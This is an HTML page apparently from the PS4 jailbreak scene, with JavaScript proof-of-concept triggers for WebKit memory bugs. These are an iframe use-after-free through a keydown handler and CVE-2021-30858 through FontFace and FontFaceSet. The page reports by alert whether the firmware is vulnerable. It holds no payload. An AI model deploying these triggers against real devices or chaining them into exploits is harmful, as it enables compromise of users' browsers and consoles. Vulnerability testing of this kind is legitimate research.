<html>
    <title>els3edy Webkit 8.xx Testing</title>
    <style>
        body {
            background-image: url("font.gif");
        /* Center and scale the image nicely */
		  background-position: center;
		  background-repeat: no-repeat;
		  background-size: cover;
        .button {
          background-color: #FF00FF;
          border-radius: 12px;
          color: black;
          padding: 15px 32px;
          text-align: center;
          text-decoration: none;
          display: inline-block;
          font-size: 16px;
          margin: 4px 2px;
          cursor: pointer;
        }
        </style>
    <script>
        async function cve() {
            alert("Press 'OK' and after this, press any key")
            frame = document.body.appendChild(document.createElement('iframe'));
            frame.contentWindow.focus();
            frame.contentDocument.addEventListener('keydown', () => {
            frame.remove();
            alert("The webkit works perfectly on your version!");
            });
        }
        /// EventHandler::keyEvent` doesn't protect `this` from being unexpectedly destroyed by a JS event handler. 
        /// Such a handler may be triggered by a `keydown` event inside `internalKeyEvent`[1]. When control returns to `keyEvent`, it loads the `m_frame` field from potentially freed memory[2].
        
        async function testwebkit() {
            try{
            alert("Testing CVE-2021-30858 on PS4 8.XX, Press OK ! (Work on IOS) \n If you get this error message: ReferenceError: FontFaceSet is not defined. \n This means that the exploit does not work on your firmware or system.");
            let font = new FontFace('font1', 'url()',{});
            alert("FontFace(). Test 1 OK!");
            var fontFaceSet = new FontFaceSet([font]);
            alert("FontFaceSet(). Test 2 OK!");
            
            font.family = 'font2';
            alert("CVE-2021-30858 WEBKIT WORK ON YOUR SYSTEM!");
              }
            catch(e){
                alert(e);
            }
        }

        async function testwebkit2() {
            try{
            alert("Testing CVE-2021-30858 on PS4 Browser.. Rev3.\n This should not give you any 'Memory Errors'.\n If 'Bug Patched' Msgs or 'Memory Error Msg' is show means this bug does not work on your current FW and has been patched!!!\nIf you get 'The String did not match the expected pattern it's OK, Means it's working as expected! :P '");
            let font = new FontFace('font1','',{});
            var fontFaceSet = new FontFaceSet([font]);
            font.family = 'font2';
            alert("Bug Patched :(");
               }
            catch(e){
                alert(e);
            }
}
    </script>
    <body>
        <center>
            <br>
       
     
        <button class="button" onclick="testwebkit()">CVE On PS4 Browser 8.XX</button>
        <br><br><br>
        <button class="button" onclick="testwebkit2()">Webkit Testing (PS4, iOS)</button><br>
        <br><br><br>   
        <button class="button" onclick="cve()">Webkit Heap-Use-After-Free</button><br>
        <br><br><br>       
        <p2 style="color:#E6E6FA">Webkit: Use-after-free and Webkit: heap-use-after-free / Site: @Zellix67 Credit: @els3edyps4</p2>
        </center>
    </body>
</html>
